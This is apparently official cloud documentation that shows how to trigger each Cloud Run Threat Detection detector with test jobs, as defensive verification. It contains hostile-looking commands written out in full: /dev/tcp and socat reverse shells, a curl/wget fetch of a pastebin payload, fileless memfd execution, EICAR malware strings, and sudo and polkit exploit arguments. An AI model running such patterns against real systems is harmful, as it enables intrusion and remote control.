This page explains how to verify that Cloud Run Threat Detection is working by intentionally triggering detectors and checking for findings. Cloud Run Threat Detection is a built-in service of Security Command Center.
Before you begin
To detect potential threats to your Cloud Run services and jobs, ensure that the Cloud Run Threat Detection service is enabled in Security Command Center. Some detectors are disabled by default. To test those detectors, you must first enable them.
Set environment variables
To test detectors, use the Google Cloud console and Cloud Shell. You can set environment variables in Cloud Shell to make it more convenient to run commands. You will use these variables to test all detectors.
Go to the Google Cloud console.
Select the project that contains the Cloud Run job that you want to use to test.
Click Activate Cloud Shell.
In Cloud Shell, set the environment variables:
Set the project and region where you will create test jobs.
export PROJECT=PROJECT_ID export REGION=REGION
With the environment variables set, you can continue to follow the instructions for testing detectors.
Command and Control: Steganography Tool Detected
To trigger a Command and Control: Steganography Tool Detected (Preview)
finding, execute a binary with file manipulation capabilities consistent with
steganography tools within a container. This example copies /bin/ls
and renames it to steghide.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-steganography-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","cp /bin/ls /tmp/steghide; sleep 60; /tmp/steghide; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Command and Control: Steganography Tool
Detected finding.
Credential Access: Find Google Cloud Credentials
To trigger a Credential Access: Find Google Cloud Credentials finding,
execute a binary capable of searching file contents within a
container. This example copies /bin/ls, renames it to grep, and executes it
with suspicious arguments.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-find-creds-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","cp /bin/ls /tmp/grep; sleep 60; /tmp/grep GOOGLE_APPLICATION_CREDENTIALS; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Credential Access: Find Google Cloud Credentials
finding.
Credential Access: GPG Key Reconnaissance
To trigger a Credential Access: GPG Key Reconnaissance finding, execute a
search tool with suspicious arguments.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-gpg-key-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","cp /bin/ls /tmp/find; sleep 60; /tmp/find secring.gpg; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Credential Access: GPG Key Reconnaissance
finding.
Credential Access: Search Private Keys or Passwords
To trigger a Credential Access: Search Private Keys or Passwords finding, execute
a search tool with suspicious arguments.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-search-keys-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","cp /bin/ls /tmp/find; sleep 60; /tmp/find id_rsa; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Credential Access: Search Private Keys or
Passwords finding.
Defense Evasion: Base64 ELF File Command Line
To trigger a Defense Evasion: Base64 ELF File Command Line finding, execute
base64 with encoded ELF header arguments.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-base64-elf-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","sleep 60; base64 -d f0VMRgIB; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure should create two Defense Evasion: Base64 ELF File Command Line
findings.
Defense Evasion: Base64 Encoded Python Script Executed
To trigger a Defense Evasion: Base64 Encoded Python Script Executed finding,
execute echo with an encoded Python command.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-base64-python-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c","sleep 60; base64 aW1wb3J0IH; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Defense Evasion: Base64 Encoded Python Script Executed
finding.
Defense Evasion: Base64 Encoded Shell Script Executed
To trigger a Defense Evasion: Base64 Encoded Shell Script Executed finding,
execute echo with an encoded shell command.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-base64-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c","sleep 60; base64 IyEvYmluL3NoC; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Defense Evasion: Base64 Encoded Shell Script Executed
finding.
Defense Evasion: Launch Code Compiler Tool In Container
To trigger a Defense Evasion: Launch Code Compiler Tool In Container
(Preview) finding, execute a compiler tool.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-launch-compiler-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","cp /bin/ls /tmp/gcc10; sleep 60; /tmp/gcc10 -o /tmp/gcc10.o; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Defense Evasion: Launch Code Compiler Tool
In Container finding.
Execution: Added Malicious Binary Executed
To trigger an Execution: Added Malicious Binary Executed finding, add a malicious binary (EICAR) to your container and execute it.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-added-malicious-bin-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","echo -n '$eicar' > /tmp/test_mal_file; chmod 700 /tmp/test_mal_file; sleep 60; /tmp/test_mal_file; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Added Malicious Binary Executed finding.
Execution: Added Malicious Library Loaded
To trigger an Execution: Added Malicious Library Loaded finding, add
a malicious library in your container and load it. This
example updates the /tmp/test_mal_lib file
with a simulated malicious library, and then loads it using mmap. The library
loading of an existing file is unexpected because the file was not in the original container image and the library is an EICAR
test file, which is classified as malicious by threat intelligence.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-add-malicious-lib-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
cat << 'EOF2' > JOB_NAME.sh
apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1
echo -n 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > /tmp/test_mal_lib
cat << 'EOF' > /tmp/loader.c
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
if (fd == -1) return 1;
struct stat sb;
if (fstat(fd, &sb) == -1) return 1;
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
if (addr == MAP_FAILED) return 1;
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
EOF
gcc /tmp/loader.c -o /tmp/loader
sleep 30
/tmp/loader /tmp/test_mal_lib
sleep 10
EOF2
ENCODED_SCRIPT=$(base64 -w 0 JOB_NAME.sh)
rm -f JOB_NAME.sh
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c","echo $ENCODED_SCRIPT | base64 -d | bash" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Added Malicious Library Loaded finding.
Execution: Container Escape
To trigger an Execution: Container Escape finding, execute a tool simulating container escape behavior.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-container-escape-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","cp /bin/ls /tmp/botb-linux-amd64; sleep 60; /tmp/botb-linux-amd64 -autopwn; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Container Escape finding.
Execution: Fileless Execution in /memfd:
To trigger an Execution: Fileless Execution in /memfd: finding,
execute a process from the /memfd: in-memory file system using Python.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-fileless-memfd-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
PYTHON_CODE=$(cat <<EOF
import os,sys
f = open('/bin/ls','rb')
execdata = f.read()
f.close()
fd = os.memfd_create('', 0)
fname = '/proc/self/fd/{}'.format(fd)
f = open(fname,'wb')
f.write(execdata)
f.close()
args = ['/bin']
os.execve(fname, args, os.environ)
EOF
)
B64_PAYLOAD=$(echo "$PYTHON_CODE" | base64 -w 0)
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image python:latest \
--command=bash \
--args="-c","sleep 60; echo $B64_PAYLOAD | base64 -d | python3 ; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Fileless Execution in /memfd:
finding.
Execution: Kubernetes Attack Tool Execution
To trigger an Execution: Kubernetes Attack Tool Execution finding, execute a program that matches a known attack tool.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-k8s-attack-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","cp /bin/ls /tmp/amicontained; sleep 60; /tmp/amicontained; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Kubernetes Attack Tool Execution finding.
Execution: Local Reconnaissance Tool Execution
To trigger an Execution: Local Reconnaissance Tool Execution finding, execute
a program that matches a reconnaissance tool.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-local-recon-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","cp /bin/ls /tmp/linenum.sh; sleep 60; /tmp/linenum.sh; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Local Reconnaissance Tool Execution finding.
Execution: Modified Malicious Binary Executed
To trigger an Execution: Modified Malicious Binary Executed finding, modify a binary to match a known malicious signature (EICAR).
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-mod-malicious-bin-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
eicar='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","echo -n '$eicar' > /etc/issue; chmod 700 /etc/issue; sleep 60; /etc/issue; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Modified Malicious Binary Executed finding.
Execution: Modified Malicious Library Loaded
To trigger an Execution: Modified Malicious Library Loaded finding, modify an
existing file with a malicious library in your container and load it. This
example updates the /etc/issue file
with a simulated malicious library, and then loads it using mmap. The library
loading of an existing file is unexpected because the library is an EICAR
test file, which is classified as malicious by threat intelligence.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-mod-malicious-lib-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
cat << 'EOF2' > JOB_NAME.sh
apt-get update && apt-get install -y gcc libc-dev --no-install-recommends > /dev/null 2>&1
echo -n 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > /etc/issue
cat << 'EOF' > /tmp/loader.c
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
if (fd == -1) return 1;
struct stat sb;
if (fstat(fd, &sb) == -1) return 1;
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
if (addr == MAP_FAILED) return 1;
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
EOF
gcc /tmp/loader.c -o /tmp/loader
sleep 30
/tmp/loader /etc/issue
sleep 10
EOF2
ENCODED_SCRIPT=$(base64 -w 0 JOB_NAME.sh)
rm -f JOB_NAME.sh
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c","echo $ENCODED_SCRIPT | base64 -d | bash" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Modified Malicious Library Loaded finding.
Execution: Netcat Remote Code Execution In Container
To trigger an Execution: Netcat Remote Code Execution In Container event,
execute netcat with suspicious arguments.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-netcat-rce-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c","cp /bin/ls /tmp/nc; sleep 60; /tmp/nc -e; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Netcat Remote Code Execution In
Container finding.
Execution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177)
To trigger an Execution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177)
finding, execute a script simulating the exploit.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-cups-cve-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c",'sleep 60; cp /bin/bash /tmp/foomatic-rip; echo "#!/tmp/foomatic-rip" >> /tmp/test.sh; echo "sh -c echo hello" >> /tmp/test.sh; chmod +x /tmp/test.sh; /tmp/test.sh; sleep 10' \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177)
finding.
Execution: Possible Remote Command Execution Detected
To trigger an Execution: Possible Remote Command Execution Detected
(Preview) finding, execute a command attempting a remote connection.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-remote-cmd-exec-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c","sleep 60; cp /bin/ls /tmp/touch; echo \"Hello\" | /tmp/touch >& /dev/tcp/8.8.8.8/53; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Possible Remote Command
Execution Detected finding.
Execution: Program Run with Disallowed HTTP Proxy Env
To trigger an Execution: Program Run with Disallowed HTTP Proxy Env finding,
execute a program with a bad proxy environment variable.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-http-proxy-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","sleep 60; cp /bin/ls /tmp/curl; HTTP_PROXY=127.0.0.1:8080 /tmp/curl; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Program Run with Disallowed
HTTP Proxy Env finding.
Execution: Socat Reverse Shell Detected
To trigger an Execution: Socat Reverse Shell Detected finding, establish a
reverse shell using the socat utility.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-socat-rev-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
RAW_SOCAT="timeout 10s /usr/bin/socat TCP-LISTEN:4444,reuseaddr,fork STDOUT & sleep 5 && timeout 5s /usr/bin/socat TCP:127.0.0.1:4444 EXEC:/bin/bash,pty,stderr || true"
B64_SOCAT=$(echo -n "$RAW_SOCAT" | base64 | tr -d '\n\r ')
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args="-c","sleep 60; apt-get update -qq && apt-get install socat -y -qq && echo $B64_SOCAT | base64 -d | bash" \
--execute-now \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Socat Reverse Shell Detected
finding.
Execution: Suspicious OpenSSL Shared Object Loaded
To trigger an Execution: Suspicious OpenSSL Shared Object Loaded finding,
execute openssl with a suspicious library.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-openssl-so-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","sleep 60; cp /bin/ls /tmp/openssl; /tmp/openssl engine /tmp/fakelib.so; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Suspicious OpenSSL Shared Object Loaded
finding.
Exfiltration: Launch Remote File Copy Tools In Container
To trigger an Exfiltration: Launch Remote File Copy Tools In Container
finding, execute a remote copy tool.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-remote-copy-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","sleep 60; cp /bin/ls /tmp/rsync; /tmp/rsync; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Exfiltration: Launch Remote File Copy Tools
In Container finding.
Impact: Detect Malicious Cmdlines
To trigger an Impact: Detect Malicious Cmdlines (Preview) finding,
execute a suspicious command name (IPFS).
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-malicious-cmd-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","sleep 60; cp /bin/ls /tmp/ipfs; /tmp/ipfs; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Impact: Detect Malicious Cmdlines
finding.
Impact: Remove Bulk Data From Disk
To trigger an Impact: Remove Bulk Data From Disk finding, execute a tool
like shred.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-remove-bulk-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","sleep 60; cp /bin/ls /tmp/shred; /tmp/shred; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Impact: Remove Bulk Data From Disk
finding.
Impact: Suspicious cryptocurrency mining activity using the Stratum Protocol
To trigger an Impact: Suspicious cryptocurrency mining activity using the Stratum
Protocol finding, execute a binary with arguments that resemble those used by
cryptocurrency mining software communicating using the Stratum protocol.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-stratum-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c","sleep 60; cp /bin/ls /tmp/curl; /tmp/curl --url=stratum+tcp; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Impact: Suspicious cryptocurrency mining activity
using the Stratum Protocol finding.
Malicious Script Executed
To trigger a Malicious Script Executed finding, execute a script that mimics malicious behavior.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-malicious-script-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","sleep 60; sh -c \"(curl -fsSL https://pastebin.com/raw/KGwfArMR||wget -q -O - https://pastebin.com/raw/KGwfArMR)| base64 -d\"; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Malicious Script Executed finding.
Malicious URL Observed
To trigger a Malicious URL Observed finding, execute a binary and provide a malicious URL as an argument.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-malicious-url-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","sleep 60; apt-get update && apt-get install curl -y && curl https://testsafebrowsing.appspot.com/s/malware.html | cat; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure triggers a Malicious URL Observed finding.
Privilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287)
To trigger a Privilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287)
finding, execute the sudo binary with the -u#-1 parameter.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-abuse-sudo-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command sh \
--args "-c","sleep 60; cp /bin/ls /tmp/sudo; /tmp/sudo -u#-1; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Privilege Escalation: Abuse of Sudo For Privilege Escalation (CVE-2019-14287)
finding.
Privilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156)
To trigger a Privilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156)
finding, execute the sudo binary with the -s parameter and a parameter that ends with ``.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-sudo-potential-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c",'sleep 60; cp /bin/ls /tmp/sudo; su $(id -un 1000) -c "/tmp/sudo -s \"123\\\\\"" ; sleep 10' \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Privilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156)
finding.
Privilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
To trigger a Privilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
finding, execute a pkexec binary with the GCONV_PATH environment variable set
as a non-root user.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-polkit-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c",'sleep 60; cp /bin/ls /tmp/pkexec; su $(id -un 1000) -c "GCONV_PATH=junk /tmp/pkexec;"; sleep 10' \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Privilege Escalation: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
finding.
Reverse Shell
To trigger a Reverse Shell finding, start a binary with stdin redirection to a
TCP-connected socket.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-reverse-shell-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command bash \
--args "-c","sleep 60; cp /bin/echo /tmp/sh; /tmp/sh >& /dev/tcp/8.8.8.8/53 0>&1; sleep 10" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Reverse Shell finding.
Execution: Cryptomining Docker Image
To trigger an Execution: Cryptomining Docker Image finding, deploy a container using a Docker image name associated with cryptomining software.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-mining-img-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image docker.io/security-test-DO-NOT-USE/xmrig:latest \
--command sh \
--wait || true
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Execution: Cryptomining Docker Image finding. Note that the job deployment will fail because the image does not exist, but the finding will still be generated.
Impact: Cryptomining Commands
To trigger an Impact: Cryptomining Commands finding, execute a command with
arguments that resemble known cryptomining software.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-mining-cmd-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image marketplace.gcr.io/google/ubuntu2404:latest \
--command xmrig \
--wait || true
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates an Impact: Cryptomining Commands finding.
Privilege Escalation: Default Compute Engine Service Account SetIAMPolicy
To trigger a Privilege Escalation: Default Compute Engine Service Account SetIAMPolicy
finding, execute a command that uses the default Compute Engine service account to
set the IAM policy of a Cloud Run service.
Create and execute the Cloud Run job:
JOB_NAME="crtd-test-set-iam-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
gcloud run jobs create $JOB_NAME \
--project $PROJECT \
--region $REGION \
--image gcr.io/google.com/cloudsdktool/google-cloud-cli:stable \
--command gcloud \
--args "run","services","add-iam-policy-binding","non-existent-service","--region",$REGION,"--member=allUsers","--role=roles/run.invoker","--quiet" \
--wait
gcloud run jobs delete $JOB_NAME --project $PROJECT --region $REGION --quiet
This test procedure creates a Privilege Escalation: Default Compute Engine Service Account SetIAMPolicy
finding.
What's next
- Learn more about Cloud Run Threat Detection.
- Learn how to use Cloud Run Threat Detection.